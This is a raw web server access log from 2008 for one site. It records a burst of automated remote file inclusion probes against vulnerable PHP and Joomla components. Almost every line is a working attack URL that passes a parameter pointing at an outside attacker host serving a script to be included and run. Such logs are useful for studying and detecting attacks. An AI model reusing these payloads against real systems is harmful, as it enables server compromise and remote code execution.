69.72.211.242 - - [24/May/2008:10:24:47 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:24:50 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:24:52 -0700] "GET /logs/access_080215.log//index.php?option=com_restaurante&task=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:24:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:24:54 -0700] "GET /logs/access_080312.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:24:55 -0700] "GET //includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:24:55 -0700] "GET /logs//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:24:55 -0700] "GET /logs/access_080201.log//includes/include_once.php?include_file=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:24:56 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:25:01 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:25:02 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:25:05 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:25:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:25:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:25:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:25:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:25:23 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.215.178 - - [24/May/2008:10:25:29 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.buysell-local.es/uploaded/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:25:36 -0700] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:25:40 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:25:40 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:25:50 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:25:51 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:25:59 -0700] "GET //administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:26:00 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:26:00 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:26:09 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:26:09 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:26:23 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:26:23 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:26:24 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:10:26:24 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:10:26:24 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [24/May/2008:10:26:25 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:26:31 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.182.184.148 - - [24/May/2008:10:26:36 -0700] "GET //administrator/components/com_lmo/lmo.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:26:41 -0700] "GET /logs/access_080220.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:26:44 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:26:52 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:26:59 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:27:02 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:27:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:27:04 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:27:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:27:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:17 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:18 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:27:19 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:27:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:27:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:28 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:29 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:29 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:38 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:27:39 -0700] "GET /logs/access_071225.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:27:39 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:27:40 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:27:45 -0700] "GET /logs/access_080218.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:27:45 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.62.128.4 - - [24/May/2008:10:27:45 -0700] "GET /logs//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:27:47 -0700] "GET /logs/access_080110.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:10:27:51 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:27:52 -0700] "GET /logs/access_080110.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:28:10 -0700] "GET /logs/index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:28:16 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:28:18 -0700] "GET /index.php?incl=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:28:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:28:30 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:28:36 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:28:52 -0700] "GET /logs/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [24/May/2008:10:28:58 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:10:29:01 -0700] "GET /index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:29:04 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.145 - - [24/May/2008:10:29:04 -0700] "GET /logs/access_080201.log//index.php?basePath=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:29:04 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:11 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:29:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:10:29:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:10:29:19 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:23 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:24 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:29:28 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:29:28 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:10:29:28 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:10:29:28 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:29:31 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:29:31 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:29:36 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:29:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:29:37 -0700] "GET /logs/access_080215.log//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:29:38 -0700] "GET //include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:29:38 -0700] "GET /logs//include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:29:48 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:29:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:30:07 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.184.73 - - [24/May/2008:10:30:07 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:30:12 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:30:19 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:30:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:30:23 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
99.175.236.97 - - [24/May/2008:10:30:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:30:26 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:30:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:30:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.81.18 - - [24/May/2008:10:30:35 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:30:36 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:30:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.81.132 - - [24/May/2008:10:30:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:10:30:40 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://poko.as.ro/s/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:10:30:45 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
